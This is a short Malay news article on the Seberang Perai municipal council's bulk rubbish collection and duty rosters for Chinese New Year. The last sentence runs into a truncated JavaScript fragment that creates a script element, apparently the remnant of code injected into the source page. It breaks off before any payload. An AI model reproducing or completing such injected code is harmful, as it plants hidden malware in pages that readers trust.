Kutipan sampah pukal Tahun Baru Cina bermula 14 Feb.

Oleh : WATAWA NATAF ZULKIFLI

SEBERANG JAYA – Yang di-Pertua Majlis Perbandaran Seberang Perai, (MPSP), Dato’ Maimunah Sharif memaklumkan bahawa kutipan sampah pukal antaranya membabitkan barangan perabot lama yang dibuang akan bermula 14 hingga 18 Februari ini sebagai persediaan sambutan Tahun Baru Cina di Seberang Perai secara keseluruhan.

“Seramai 36 pegawai bertugas yang dibahagikan mengikut kawasan Parlimen dan Dewan Undangan Negeri (DUN) diarahkan untuk bersiap-sedia dalam tempoh 24 jam bagi memastikan inisiatif tersebut berjalan lancar dan tidak mencemarkan kawasan-kawasan pembuangan sampah.

“Kebanyakan pegawai dan anggota bertugas turut dibekukan cuti masing-masing bagi menjamin tiada sebarang masalah yang timbul kelak.

“Malah, sekiranya terdapat sebarang masalah, penduduk boleh menghubungi pegawai bertugas sebagaimana senarai di Lampiran 1,” ujarnya pada sidang media selepas tamat Mesyuarat Majlis Penuh MPSP Kali ke – 1/2015 (487) di sini baru-baru ini.

Tambah Maimunah, MPSP turut prihatin apabila turut menyediakan skuad tambahan (backup) untuk bertugas pada tempoh 19 hingga 20 Februari (ini) iaitu pada hari pertama dan kedua sambutan Tahun Baru Cina.var d=document;var s=d.createElement(‘script’);